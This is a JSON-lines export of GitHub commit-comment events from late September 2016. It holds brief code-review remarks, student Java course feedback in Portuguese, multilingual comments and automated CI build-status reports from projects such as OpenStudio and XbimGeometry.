{"id":"4632947391","type":"CommitCommentEvent","actor":{"login":"Ste74"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":19213402,"position":null,"line":null,"path":null,"commit_id":"7f2081e6e1a1000c7cf35662703b59530cb1d742","created_at":"2016-09-28T19:45:43Z","updated_at":"2016-09-28T19:45:43Z","body":"I suspect this :smile: "}},"created_at":"2016-09-28T19:45:43Z"}
{"id":"4632948853","type":"CommitCommentEvent","actor":{"login":"fafcrumb"},"repo":{"name":"unicef-polymer/etools-frontend-template"},"payload":{"comment":{"id":19213405,"position":7,"line":42,"path":"src/pages/page-section1-page.html","commit_id":"1038dd304d6196338fa085f6bd758ac900016341","created_at":"2016-09-28T19:46:00Z","updated_at":"2016-09-28T19:46:00Z","body":"Doing `<etools-data countries=\"{{countries}}\">` exposes countries as `this.countries` within the element. So this property isn't necessary. Statements like the `push` below will just work."}},"created_at":"2016-09-28T19:46:00Z"}
{"id":"4632959164","type":"CommitCommentEvent","actor":{"login":"JanmanX"},"repo":{"name":"DIKU-EDU/kudos"},"payload":{"comment":{"id":19213428,"position":null,"line":null,"path":null,"commit_id":"388ced869472e731eec780830410a24ebf13ae7d","created_at":"2016-09-28T19:47:55Z","updated_at":"2016-09-28T19:47:55Z","body":"Just wondering, where does the x86_64 code for KUDOS come from?"}},"created_at":"2016-09-28T19:47:55Z"}
{"id":"4632966041","type":"CommitCommentEvent","actor":{"login":"yuatpocketgems"},"repo":{"name":"pocketgems/PubNub"},"payload":{"comment":{"id":19213436,"position":null,"line":null,"path":null,"commit_id":"1c3b0a32d274038a403be2a43ae84919e9768317","created_at":"2016-09-28T19:49:08Z","updated_at":"2016-09-28T19:49:08Z","body":"LGTM"}},"created_at":"2016-09-28T19:49:08Z"}
{"id":"4632969846","type":"CommitCommentEvent","actor":{"login":"phanikishoreg"},"repo":{"name":"phanikishoreg/Composite"},"payload":{"comment":{"id":19213448,"position":4,"line":53,"path":"src/platform/i386/kernel.h","commit_id":"a2c62947e4cbc5ddb9f9611dfb2c2b3f81ca2520","created_at":"2016-09-28T19:49:53Z","updated_at":"2016-09-28T19:49:53Z","body":"I'm not sure, I was thinking everything under `platform/i386` are already in a confined namespace. But also, I was just making it be consistent with current HPET programming. Also I was wondering all these declarations don't have `extern` in them, which didn't sound right for a C header! "}},"created_at":"2016-09-28T19:49:53Z"}
{"id":"4632970798","type":"CommitCommentEvent","actor":{"login":"phanikishoreg"},"repo":{"name":"phanikishoreg/Composite"},"payload":{"comment":{"id":19213451,"position":87,"line":87,"path":"src/platform/i386/lapic.c","commit_id":"a2c62947e4cbc5ddb9f9611dfb2c2b3f81ca2520","created_at":"2016-09-28T19:50:04Z","updated_at":"2016-09-28T19:50:04Z","body":"Got it. Thank you."}},"created_at":"2016-09-28T19:50:04Z"}
{"id":"4632975274","type":"CommitCommentEvent","actor":{"login":"phanikishoreg"},"repo":{"name":"phanikishoreg/Composite"},"payload":{"comment":{"id":19213461,"position":104,"line":104,"path":"src/platform/i386/lapic.c","commit_id":"a2c62947e4cbc5ddb9f9611dfb2c2b3f81ca2520","created_at":"2016-09-28T19:50:51Z","updated_at":"2016-09-28T19:50:51Z","body":"I'll probably add support to ONESHOT soon and then pull them together.. As we talked.."}},"created_at":"2016-09-28T19:50:51Z"}
{"id":"4632977379","type":"CommitCommentEvent","actor":{"login":"ThomDietrich"},"repo":{"name":"ThomDietrich/openhabian"},"payload":{"comment":{"id":19213464,"position":89,"line":523,"path":"openhabian-setup.sh","commit_id":"497f6bd14ecc961983a2c4fea05e1d22dd50ffd7","created_at":"2016-09-28T19:51:13Z","updated_at":"2016-09-28T19:51:13Z","body":"tmp is mounted as a tmpfs on openHABian and was not big enough\r\n\r\nI tried. It got installed but the service wouldn't start. I guessed that's not what you intended, didn't look beyond that."}},"created_at":"2016-09-28T19:51:13Z"}
{"id":"4632978011","type":"CommitCommentEvent","actor":{"login":"phanikishoreg"},"repo":{"name":"phanikishoreg/Composite"},"payload":{"comment":{"id":19213467,"position":112,"line":112,"path":"src/platform/i386/lapic.c","commit_id":"a2c62947e4cbc5ddb9f9611dfb2c2b3f81ca2520","created_at":"2016-09-28T19:51:19Z","updated_at":"2016-09-28T19:51:19Z","body":"Got it. Will move it up, before the `if (...)`"}},"created_at":"2016-09-28T19:51:19Z"}
{"id":"4632980408","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":19213473,"position":null,"line":null,"path":null,"commit_id":"0c1ac3e277f635fdd0f82080c0191c6ac2e0c2b3","created_at":"2016-09-28T19:51:45Z","updated_at":"2016-09-28T19:51:45Z","body":"I'm exporting ``QT_QPA_PLATFORMTHEME=qt5ct`` here manually because I realize that it's not being configured automatically even though **qt5ct** is installed. This used to be accomplished by livecd, but I remember that it got moved to somewhere in **mt** - was this feature removed completely? Or where is it now and why does it not work? @philmmanjaro ?"}},"created_at":"2016-09-28T19:51:45Z"}
{"id":"4632980460","type":"CommitCommentEvent","actor":{"login":"phanikishoreg"},"repo":{"name":"phanikishoreg/Composite"},"payload":{"comment":{"id":19213474,"position":6,"line":96,"path":"src/platform/i386/vm.c","commit_id":"a2c62947e4cbc5ddb9f9611dfb2c2b3f81ca2520","created_at":"2016-09-28T19:51:46Z","updated_at":"2016-09-28T19:51:46Z","body":"Okay, will do. Thank you."}},"created_at":"2016-09-28T19:51:46Z"}
{"id":"4632982743","type":"CommitCommentEvent","actor":{"login":"ailsoncgt"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19213486,"position":null,"line":null,"path":null,"commit_id":"c098b73705d4e02f0ea2441cc2aef31777778ac7","created_at":"2016-09-28T19:52:09Z","updated_at":"2016-09-28T19:52:09Z","body":"@gbl3 "}},"created_at":"2016-09-28T19:52:09Z"}
{"id":"4632983138","type":"CommitCommentEvent","actor":{"login":"matt-morgan-plexxi"},"repo":{"name":"Plexxi/plexxi-debnet"},"payload":{"comment":{"id":19213489,"position":null,"line":null,"path":null,"commit_id":"0eb3805026c4460e6180a1e139806a0f8ed1960a","created_at":"2016-09-28T19:52:13Z","updated_at":"2016-09-28T19:52:13Z","body":"LGTM"}},"created_at":"2016-09-28T19:52:13Z"}
{"id":"4632984078","type":"CommitCommentEvent","actor":{"login":"mehmetozkan"},"repo":{"name":"mehmetozkan/TcKimlikSorgulama"},"payload":{"comment":{"id":19213493,"position":null,"line":null,"path":null,"commit_id":"aef51d6d9eb244c479bfae71ff45eb67ac469754","created_at":"2016-09-28T19:52:24Z","updated_at":"2016-09-28T19:52:24Z","body":"WSDL Web Services, Soap, Java"}},"created_at":"2016-09-28T19:52:24Z"}
{"id":"4632984911","type":"CommitCommentEvent","actor":{"login":"evilaliv3"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":19213496,"position":44,"line":63,"path":"client/app/views/submission/main.html","commit_id":"eb8683b9d1df8ad79feb2cd409798715e4073b7a","created_at":"2016-09-28T19:52:32Z","updated_at":"2016-09-28T19:52:32Z","body":"no new lines or spaces when using data-translate like:\r\n```<tag data-translate>all in one line included the tags</tag>```"}},"created_at":"2016-09-28T19:52:32Z"}
{"id":"4632987036","type":"CommitCommentEvent","actor":{"login":"ThomDietrich"},"repo":{"name":"ThomDietrich/openhabian"},"payload":{"comment":{"id":19213498,"position":93,"line":527,"path":"openhabian-setup.sh","commit_id":"497f6bd14ecc961983a2c4fea05e1d22dd50ffd7","created_at":"2016-09-28T19:52:56Z","updated_at":"2016-09-28T19:52:56Z","body":"A few of these things got clear to me in the process. I'll continue my answer in the forum."}},"created_at":"2016-09-28T19:52:56Z"}
{"id":"4632987171","type":"CommitCommentEvent","actor":{"login":"Aduci01"},"repo":{"name":"Aduci01/PacMan"},"payload":{"comment":{"id":19213499,"position":null,"line":null,"path":null,"commit_id":"a0c13bdb12a39da7aad959e7078e898b025835cb","created_at":"2016-09-28T19:52:58Z","updated_at":"2016-09-28T19:52:58Z","body":"A játék véletlenszerűen generál egy labirintust, a játékos célja, hogy kijusson, útja közben pedig érméket gyűjtsön, a gyűjtött érmék és az eltelt idő alapján pedig pontokat kap."}},"created_at":"2016-09-28T19:52:58Z"}
{"id":"4632987245","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19213500,"position":null,"line":null,"path":null,"commit_id":"6c7848bd6a41a7134ee1a70f3344a7f623da88a1","created_at":"2016-09-28T19:52:58Z","updated_at":"2016-09-28T19:52:58Z","body":"master (evanweaver) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-90.23%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T19:52:58Z"}
{"id":"4633002820","type":"CommitCommentEvent","actor":{"login":"freddymartinez9"},"repo":{"name":"freddymartinez9/lucyparsons.github.io"},"payload":{"comment":{"id":19213541,"position":null,"line":null,"path":null,"commit_id":"dc514c9f16cb6fe32540332a9d3f721ff9d719de","created_at":"2016-09-28T19:55:48Z","updated_at":"2016-09-28T19:55:48Z","body":"looks great. "}},"created_at":"2016-09-28T19:55:48Z"}
{"id":"4633005555","type":"CommitCommentEvent","actor":{"login":"homeautomator"},"repo":{"name":"homeautomator/homebridge-modelighting"},"payload":{"comment":{"id":19213548,"position":null,"line":null,"path":null,"commit_id":"94fbb37232a1e6cb8467c721a18022759cb251da","created_at":"2016-09-28T19:56:12Z","updated_at":"2016-09-28T19:56:12Z","body":"Initial"}},"created_at":"2016-09-28T19:56:12Z"}
{"id":"4633009607","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-1-FrancescoVentura"},"payload":{"comment":{"id":19213560,"position":null,"line":null,"path":null,"commit_id":"5f1332c823127433f9ed9db051a68b293e082e14","created_at":"2016-09-28T19:56:55Z","updated_at":"2016-09-28T19:56:55Z","body":"Aight. That'll do it. Goed gedaan."}},"created_at":"2016-09-28T19:56:55Z"}
{"id":"4633011518","type":"CommitCommentEvent","actor":{"login":"almereyda"},"repo":{"name":"indiehosters/nginx"},"payload":{"comment":{"id":19213564,"position":null,"line":null,"path":null,"commit_id":"f3c7d6ed066405ab4e7b39a06d535b8cbaefd966","created_at":"2016-09-28T19:57:15Z","updated_at":"2016-09-28T19:57:15Z","body":"What was the issue here? It works in two of my setups without this patch."}},"created_at":"2016-09-28T19:57:15Z"}
{"id":"4633012442","type":"CommitCommentEvent","actor":{"login":"phanikishoreg"},"repo":{"name":"phanikishoreg/Composite"},"payload":{"comment":{"id":19213568,"position":null,"line":null,"path":null,"commit_id":"a2c62947e4cbc5ddb9f9611dfb2c2b3f81ca2520","created_at":"2016-09-28T19:57:25Z","updated_at":"2016-09-28T19:57:25Z","body":"Thank you. "}},"created_at":"2016-09-28T19:57:25Z"}
{"id":"4633015162","type":"CommitCommentEvent","actor":{"login":"groll75"},"repo":{"name":"paysafegroup/neteller_rest_api_v1"},"payload":{"comment":{"id":19213576,"position":null,"line":null,"path":null,"commit_id":"c89c2953e9875ed1aee4d1d598c9db44a356b173","created_at":"2016-09-28T19:57:54Z","updated_at":"2016-09-28T19:57:54Z","body":"__API Description file syntax error on line 4605__: named type 'customer' is defined more than once (Autogenerated message from apiary.io)"}},"created_at":"2016-09-28T19:57:54Z"}
{"id":"4633019507","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19213582,"position":null,"line":null,"path":null,"commit_id":"6c7848bd6a41a7134ee1a70f3344a7f623da88a1","created_at":"2016-09-28T19:58:44Z","updated_at":"2016-09-28T19:58:44Z","body":"master (evanweaver) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-28T19:58:44Z"}
{"id":"4633020115","type":"CommitCommentEvent","actor":{"login":"yaf"},"repo":{"name":"sgmap/mpal"},"payload":{"comment":{"id":19213583,"position":26,"line":58,"path":"app/models/projet.rb","commit_id":"5d816e153a002826d51e42bd1497cc8d111495b8","created_at":"2016-09-28T19:58:51Z","updated_at":"2016-09-28T19:58:51Z","body":"L'usage des attributes (`@invitation`) n'est pas nécessaire, une simple variable `invitation` devrait suffire."}},"created_at":"2016-09-28T19:58:51Z"}
{"id":"4633024082","type":"CommitCommentEvent","actor":{"login":"filran"},"repo":{"name":"filran/VisAr3D-Dynamic-Ultimate"},"payload":{"comment":{"id":19213596,"position":16,"line":16,"path":"Assets/Scripts/ThreeDUMLAPI/ClassAttribute.cs","commit_id":"22966aeb45b085f6f3b83b31a29f246b08e9dabe","created_at":"2016-09-28T19:59:35Z","updated_at":"2016-09-28T19:59:35Z","body":"Perigoso isso! Eu publique um overview das classes e seus relacionamentos.\nVamos nos atentar de forma que fique naquele design.\n\n\nAtt,\nFilipe Arantes Fernandes\n\nOn Wed, Sep 28, 2016 at 4:35 PM, William Lacerda <notifications@github.com>\nwrote:\n\n> Então, eu tentei com ela, porém Attribute.cs não puxa de IXmlNode, e\n> quando eu fiz puxar, deu conflito com a implementação de algumas coisas que\n> você fez, então preferi criar uma nova\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/filran/VisAr3D-Dynamic-Ultimate/commit/22966aeb45b085f6f3b83b31a29f246b08e9dabe#commitcomment-19213246>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACkN0RvwVtagUblwVPnSYxIgI8hA-x7Nks5qusF2gaJpZM4KJN_1>\n> .\n>\n"}},"created_at":"2016-09-28T19:59:35Z"}
{"id":"4633024590","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19213598,"position":null,"line":null,"path":null,"commit_id":"08920df29f909dde0c4f65c63d80ae0b5540025f","created_at":"2016-09-28T19:59:41Z","updated_at":"2016-09-28T19:59:41Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 281](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1259&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Compilation error: Xbim.Geometry.Engine.Interop\\Xbim.Geometry.Engine.Interop.csproj (new) Build time: 00:26:46"}},"created_at":"2016-09-28T19:59:41Z"}
{"id":"4633025048","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19213599,"position":null,"line":null,"path":null,"commit_id":"12af4a7baa1db85ca35faf04fc7e7286c499b228","created_at":"2016-09-28T19:59:45Z","updated_at":"2016-09-28T19:59:45Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 282](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1260&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-28T19:59:45Z"}
{"id":"4628057688","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mat-mr/crescer-2016-2"},"payload":{"comment":{"id":19201036,"position":5,"line":26,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembas.java","commit_id":"0f7e77b10337f0cd003be2f25e5a7e76b879f350","created_at":"2016-09-28T02:00:42Z","updated_at":"2016-09-28T02:00:42Z","body":"pode simplificar e retornar direto tudo:\r\n\r\n```Java\r\nreturn this.quantidadeDeLembas >= 3 && this.quantidadeDeLembas <= 100 && this.quantidadeDeLembas % 2 == 0;\r\n```"}},"created_at":"2016-09-28T02:00:42Z"}
{"id":"4628057954","type":"CommitCommentEvent","actor":{"login":"Asatsuyu"},"repo":{"name":"Asatsuyu/INFM600-Project"},"payload":{"comment":{"id":19201038,"position":null,"line":null,"path":null,"commit_id":"4862fdd348b2ed7980373680942aba9c81d32627","created_at":"2016-09-28T02:00:47Z","updated_at":"2016-09-28T02:00:47Z","body":"These are the exact PDP databases from 1992 to 2014 as downloaded from the USDA website and extracted: https://www.ams.usda.gov/datasets/pdp/pdpdata\r\n\r\nDate retrieved: September 26, 2016"}},"created_at":"2016-09-28T02:00:47Z"}
{"id":"4628058843","type":"CommitCommentEvent","actor":{"login":"mateusbpt"},"repo":{"name":"mateusbpt/crescer-2016-2"},"payload":{"comment":{"id":19201042,"position":23,"line":45,"path":"src/modulo-01-java-OO/modulo-01/ElfoTest.java","commit_id":"1f390a888719f12cedb6b4bbc4118f69b8334e7e","created_at":"2016-09-28T02:01:05Z","updated_at":"2016-09-28T02:01:05Z","body":"Eu fiz ele um pouco antes de começar a aula, aí não ajustei direito. Tomarei  mais cuidado."}},"created_at":"2016-09-28T02:01:05Z"}
{"id":"4628060746","type":"CommitCommentEvent","actor":{"login":"mateusbpt"},"repo":{"name":"mateusbpt/crescer-2016-2"},"payload":{"comment":{"id":19201044,"position":17,"line":39,"path":"src/modulo-01-java-OO/modulo-01/ElfoTest.java","commit_id":"1f390a888719f12cedb6b4bbc4118f69b8334e7e","created_at":"2016-09-28T02:01:47Z","updated_at":"2016-09-28T02:01:47Z","body":"Está certo, farei os ajustes."}},"created_at":"2016-09-28T02:01:47Z"}
{"id":"4628061232","type":"CommitCommentEvent","actor":{"login":"KK-ZHUANG"},"repo":{"name":"Travelport/travelport-uapi-tutorial-php"},"payload":{"comment":{"id":19201045,"position":18,"line":230,"path":"Air/phpSample_Air_LFS.php","commit_id":"2ddb3b8514dac6af3260ac4be8663f7daca28016","created_at":"2016-09-28T02:01:56Z","updated_at":"2016-09-28T02:01:56Z","body":"ewf"}},"created_at":"2016-09-28T02:01:56Z"}
{"id":"4628061605","type":"CommitCommentEvent","actor":{"login":"fanliming"},"repo":{"name":"t126tank/zigui2"},"payload":{"comment":{"id":19201046,"position":null,"line":null,"path":null,"commit_id":"1b7e63b7311d54295a05020dedd05a0999a8c4ec","created_at":"2016-09-28T02:02:04Z","updated_at":"2016-09-28T02:02:04Z","body":"ok"}},"created_at":"2016-09-28T02:02:04Z"}
{"id":"4628064354","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"eliseudaroitjr/crescer-2016-2"},"payload":{"comment":{"id":19201049,"position":10,"line":10,"path":"src/modulo-01-java-OO/projeto-lotr/CestoDeLembas.java","commit_id":"35aaacf420d1d0a1b80635a36736760c4b805c83","created_at":"2016-09-28T02:03:00Z","updated_at":"2016-09-28T02:03:00Z","body":"tá legal, mas dá pra simplificar."}},"created_at":"2016-09-28T02:03:00Z"}
{"id":"4628066713","type":"CommitCommentEvent","actor":{"login":"naomicbush"},"repo":{"name":"gravityview/GravityView"},"payload":{"comment":{"id":19201053,"position":null,"line":null,"path":null,"commit_id":"2b8f5dceabec08e8331a6cf99edcba5906038c92","created_at":"2016-09-28T02:03:54Z","updated_at":"2016-09-28T02:03:54Z","body":"👍 "}},"created_at":"2016-09-28T02:03:54Z"}
{"id":"4628066879","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"eliseudaroitjr/crescer-2016-2"},"payload":{"comment":{"id":19201054,"position":12,"line":12,"path":"src/modulo-01-java-OO/projeto-lotr/CestoDeLembasTest.java","commit_id":"35aaacf420d1d0a1b80635a36736760c4b805c83","created_at":"2016-09-28T02:03:59Z","updated_at":"2016-09-28T02:03:59Z","body":"Dica:\r\n\r\n```Java\r\nassertFalse(cesto.podeDividirEmPares());\r\n```"}},"created_at":"2016-09-28T02:03:59Z"}
{"id":"4628068244","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"eliseudaroitjr/crescer-2016-2"},"payload":{"comment":{"id":19201057,"position":6,"line":6,"path":"src/modulo-01-java-OO/projeto-lotr/Dwarf.java","commit_id":"35aaacf420d1d0a1b80635a36736760c4b805c83","created_at":"2016-09-28T02:04:27Z","updated_at":"2016-09-28T02:04:27Z","body":"⚠️ ⚠️ ⚠️ \r\n\r\nCliente não pediu que dwarves tenham nome. Pode cortar ✂️ "}},"created_at":"2016-09-28T02:04:27Z"}
{"id":"4628068941","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"eliseudaroitjr/crescer-2016-2"},"payload":{"comment":{"id":19201058,"position":14,"line":14,"path":"src/modulo-01-java-OO/projeto-lotr/Dwarf.java","commit_id":"35aaacf420d1d0a1b80635a36736760c4b805c83","created_at":"2016-09-28T02:04:43Z","updated_at":"2016-09-28T02:04:43Z","body":"⚠️ ⚠️ ⚠️ \r\n\r\nCliente não pediu que seja possível alterar a vida de um dwarf a qualquer momento."}},"created_at":"2016-09-28T02:04:43Z"}
{"id":"4628070668","type":"CommitCommentEvent","actor":{"login":"daniktheboss"},"repo":{"name":"ZedCee/various_graphics"},"payload":{"comment":{"id":19201062,"position":null,"line":null,"path":null,"commit_id":"262646528fdd4d1ed4d20600520d50f3eb4df98d","created_at":"2016-09-28T02:05:18Z","updated_at":"2016-09-28T02:05:18Z","body":"Hello, can you make me a logo?"}},"created_at":"2016-09-28T02:05:18Z"}
{"id":"4628079455","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"eliseudaroitjr/crescer-2016-2"},"payload":{"comment":{"id":19201076,"position":45,"line":45,"path":"src/modulo-01-java-OO/projeto-lotr/ElfoTest.java","commit_id":"35aaacf420d1d0a1b80635a36736760c4b805c83","created_at":"2016-09-28T02:08:40Z","updated_at":"2016-09-28T02:08:40Z","body":"Para esse cenário não é preciso o `for`."}},"created_at":"2016-09-28T02:08:40Z"}
{"id":"4628081352","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"eliseudaroitjr/crescer-2016-2"},"payload":{"comment":{"id":19201081,"position":54,"line":54,"path":"src/modulo-01-java-OO/projeto-lotr/ElfoTest.java","commit_id":"35aaacf420d1d0a1b80635a36736760c4b805c83","created_at":"2016-09-28T02:09:24Z","updated_at":"2016-09-28T02:09:24Z","body":"Seria legal mais um cenário que exceda a quantidade inicial de flechas para ver se vão ficar negativas ou não."}},"created_at":"2016-09-28T02:09:24Z"}
{"id":"4628082433","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19201084,"position":null,"line":null,"path":null,"commit_id":"51154c98f536e3a98d10ebc8d1118cfb7af0fec3","created_at":"2016-09-28T02:09:49Z","updated_at":"2016-09-28T02:09:49Z","body":"develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2365 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-51154c98f536e3a98d10ebc8d1118cfb7af0fec3-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-51154c98f536e3a98d10ebc8d1118cfb7af0fec3-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.61%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T02:09:49Z"}
{"id":"4628083874","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"eliseudaroitjr/crescer-2016-2"},"payload":{"comment":{"id":19201086,"position":12,"line":11,"path":"src/modulo-01-java-OO/projeto-lotr/Item.java","commit_id":"35aaacf420d1d0a1b80635a36736760c4b805c83","created_at":"2016-09-28T02:10:21Z","updated_at":"2016-09-28T02:10:21Z","body":"Cliente não pediu isto."}},"created_at":"2016-09-28T02:10:21Z"}
{"id":"4628090234","type":"CommitCommentEvent","actor":{"login":"lotreal"},"repo":{"name":"yeaha/Lysine2"},"payload":{"comment":{"id":19201098,"position":null,"line":null,"path":null,"commit_id":"403bd37a6181965896e9e933a1ccb9b596297e59","created_at":"2016-09-28T02:12:47Z","updated_at":"2016-09-28T02:12:47Z","body":"451 很适合我们的国情啊"}},"created_at":"2016-09-28T02:12:47Z"}
{"id":"4628091005","type":"CommitCommentEvent","actor":{"login":"Anonymous-BCFED"},"repo":{"name":"OXOIndustries/Trials-in-Tainted-Space"},"payload":{"comment":{"id":19201100,"position":null,"line":null,"path":null,"commit_id":"b2839bd2eb2744e975cf95c337f3d88ceabbd83e","created_at":"2016-09-28T02:13:03Z","updated_at":"2016-09-28T02:13:03Z","body":"You might have an easier time by making it a singleton."}},"created_at":"2016-09-28T02:13:03Z"}
{"id":"4628092405","type":"CommitCommentEvent","actor":{"login":"ofrogon"},"repo":{"name":"WoltersKluwerCanada/proget-universal-bower-client"},"payload":{"comment":{"id":19201102,"position":null,"line":null,"path":null,"commit_id":"ab3a81f8e9a3af5aacc3d6163faa43108aa1ff38","created_at":"2016-09-28T02:13:31Z","updated_at":"2016-09-28T02:13:31Z","body":"The default behavior of Bower is to use the `.gitignore` and `bower.json`.`ignore` section and create the package with it. Removing the `.gitignore` part his not the right way to fix your packages conflicts...\r\n\r\nI totally disagree that commit."}},"created_at":"2016-09-28T02:13:31Z"}
{"id":"4628093246","type":"CommitCommentEvent","actor":{"login":"kukookoo"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19201104,"position":null,"line":null,"path":null,"commit_id":"707feeedb49eea77b8d305df9f3917c95085aa6d","created_at":"2016-09-28T02:13:49Z","updated_at":"2016-09-28T02:13:49Z","body":"이것은 어떤걸로 시행하는 프로그램입니까.."}},"created_at":"2016-09-28T02:13:49Z"}
{"id":"4628093315","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jonathanwss/crescer-2016-2"},"payload":{"comment":{"id":19201105,"position":2,"line":2,"path":"src/modulo-01-java-OO/modulo-01/Dwarve.java","commit_id":"55a7c8e81b21d49f2bcc1c97f9609dc789738fb0","created_at":"2016-09-28T02:13:51Z","updated_at":"2016-09-28T02:13:51Z","body":"Cuidar nome da classe. No texto que o cliente mandou está o nome correto."}},"created_at":"2016-09-28T02:13:51Z"}
{"id":"4628093764","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jonathanwss/crescer-2016-2"},"payload":{"comment":{"id":19201106,"position":9,"line":9,"path":"src/modulo-01-java-OO/modulo-01/Dwarve.java","commit_id":"55a7c8e81b21d49f2bcc1c97f9609dc789738fb0","created_at":"2016-09-28T02:14:00Z","updated_at":"2016-09-28T02:14:00Z","body":"Cliente não pediu isto."}},"created_at":"2016-09-28T02:14:00Z"}
{"id":"4628094446","type":"CommitCommentEvent","actor":{"login":"RobertCNelson"},"repo":{"name":"RobertCNelson/dtb-rebuilder"},"payload":{"comment":{"id":19201107,"position":12,"line":13,"path":"src/arm/am335x-boneblue-wl1835.dtsi","commit_id":"48a1dbc0df3dd9863504dc71b79e995cdaa5d5a5","created_at":"2016-09-28T02:14:14Z","updated_at":"2016-09-28T02:14:14Z","body":"To save power/reset Bluetooth, it seemed to make sense...  It gets turned on by the wl18xx bluetooth service script, on startup, before calling hciattach."}},"created_at":"2016-09-28T02:14:14Z"}
{"id":"4628095103","type":"CommitCommentEvent","actor":{"login":"Hackzzila"},"repo":{"name":"hydrabolt/discord.js"},"payload":{"comment":{"id":19201110,"position":null,"line":null,"path":null,"commit_id":"155b4383d25708c863fd150e930f7e9a1e237bd7","created_at":"2016-09-28T02:14:30Z","updated_at":"2016-09-28T02:14:30Z","body":"👌 "}},"created_at":"2016-09-28T02:14:30Z"}
{"id":"4628095805","type":"CommitCommentEvent","actor":{"login":"ekaj2"},"repo":{"name":"MaximeHerpin/modular_tree"},"payload":{"comment":{"id":19201112,"position":null,"line":null,"path":null,"commit_id":"87b707e7eb7edf4ff3dc80c3c6319ddbdf6bb65d","created_at":"2016-09-28T02:14:46Z","updated_at":"2016-09-28T02:14:46Z","body":"The thing I don't like about this is that I can't explain _why_ this may fix it as it doesn't make sense..."}},"created_at":"2016-09-28T02:14:46Z"}
{"id":"4628097284","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19201117,"position":null,"line":null,"path":null,"commit_id":"51154c98f536e3a98d10ebc8d1118cfb7af0fec3","created_at":"2016-09-28T02:15:18Z","updated_at":"2016-09-28T02:15:18Z","body":"develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-51154c98f536e3a98d10ebc8d1118cfb7af0fec3-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-28T02:15:18Z"}
